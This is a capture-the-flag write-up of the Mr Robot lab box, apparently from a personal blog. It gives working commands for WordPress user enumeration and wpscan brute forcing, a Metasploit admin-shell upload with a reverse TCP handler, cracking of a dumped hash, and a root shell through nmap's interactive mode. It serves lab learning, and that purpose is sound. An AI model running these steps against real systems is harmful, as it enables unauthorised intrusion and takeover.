Mr Robot Vulnhub/TryHackMe

____  ___ _____                     __         ____  ___
\   \/  // ____\____ ___  _______ _/  |______  \   \/  /
 \     /\   __\\__  \\  \/ /\__  \\   __\__  \  \     / 
 /     \ |  |   / __ \\   /  / __ \|  |  / __ \_/     \ 
/___/\  \|__|  (____  /\_/  (____  /__| (____  /___/\  \
      \_/           \/           \/          \/      \_/

home :: mail :: twitter

---===/// Mr Robot Vulnhub/TryHackMe ///===---

Based on the show, Mr. Robot.

This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.

Mr Robot CTF is available as either a vulnhub download VM or as a room on TryHackMe. I initially attacked this box while in chat with some friends but I am going through it again on TryHackMe for the purpose of this write up. I won't be putting the keys in this write up. If you'd like to know the keys, following along and do the box for yourself!

I first deployed the box and was given the address 10.10.41.78. We will do a simple nmap scan to find open ports.

PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https

We can see a web server is running on the box. It's a pretty cool Mr Robot site they've built, but there is nothing of interest to us on the actual site. We can do a quick dirsearch to see if we find anything interesting.

Two interesting things pop out pretty quickly: robots.txt and wp-login.php

User-agent: *
fsocity.dic
key-1-of-3.txt

So we've found our first key, and a dictionary file of passwords. Time to brute force that wordpress login.

We can go to the wordpress login page and try a couple obvious user names to see if anything is a match. Admin, mrrobot, etc. Most names will give you the following error: ERROR: Invalid username. Lost your password?, but after trying the username 'elliot' you'll be greeted with the following message: ERROR: The password you entered for the username elliot is incorrect. Lost your password?

This verifies that elliot is a valid username, and most likely the one we are looking to break. We can run sort and uniq on the password file to remove any duplicates, which takes it from over 800,000 entires down to around 11,000.

sort fsocity.dic | uniq > newfs.dic

We can now use WPScan to brute force the password, with the following command

wpscan --url http://10.10.41.78/ -U elliot -P ./newfs.dic

[+] Performing password attack on Xmlrpc Multicall against 1 user/s
Progress Time: 00:00:00 <==============================================> (0 / 0) 100.0% Time: 00:00:00
[SUCCESS] - elliot / ER28-0652                                                                                                                             
All Found

We can now use metasploit to upload a reverse shell via a wordpress plugin using unix/webapp/wp_admin_shell_upload.

set RHOST 10.10.41.78
set PASSWORD ER28-0652
set USERNAME elliot

[*] Started reverse TCP handler on 10.0.2.15:4444 
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.

After stumbling with this a few times, a friend showed me a page discussing the same error and a possible solution. Setting WPCHECK to false will bypass verifying if it is a valid wordpress install.

Once into our meterpreter session, we can go to the home directory and find robot user directory. There we will find the following files.

100400/r--------  33    fil   2015-11-13 07:28:21 +0000  key-2-of-3.txt
100644/rw-r--r--  39    fil   2015-11-13 07:28:21 +0000  password.raw-md5

meterpreter > cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

After cracking the password we can upgrade to the robot user using su.

su -l robot
su: must be run from a terminal

This is a common problem you might run into with meterpreter. We can upgrade our terminal using this simple python one-liner.

python -c 'import pty; pty.spawn("/bin/bash")'
$ su -l robot

We can now read key-2-of-3.txt and proceed to privesc for the third key. A quick check will show that an older version of nmap is installed on the system, and nmap runs with root privileges. We can start this version of nmap in an interactive shell, and then drop out to a root shell from there.

$ nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h  for help
nmap> !sh
!sh
#

We can now go to the root directory, where we will find key-3-of-3.txt and finish the box.

Overall this box was a lot of fun, and I learned a lot about using WPScan and solving difficulties with Metasploit exploits not working as expected. I also transitioned from Parrot back to Kali, as I've encountered numerous issues with things not working correctly in Parrot.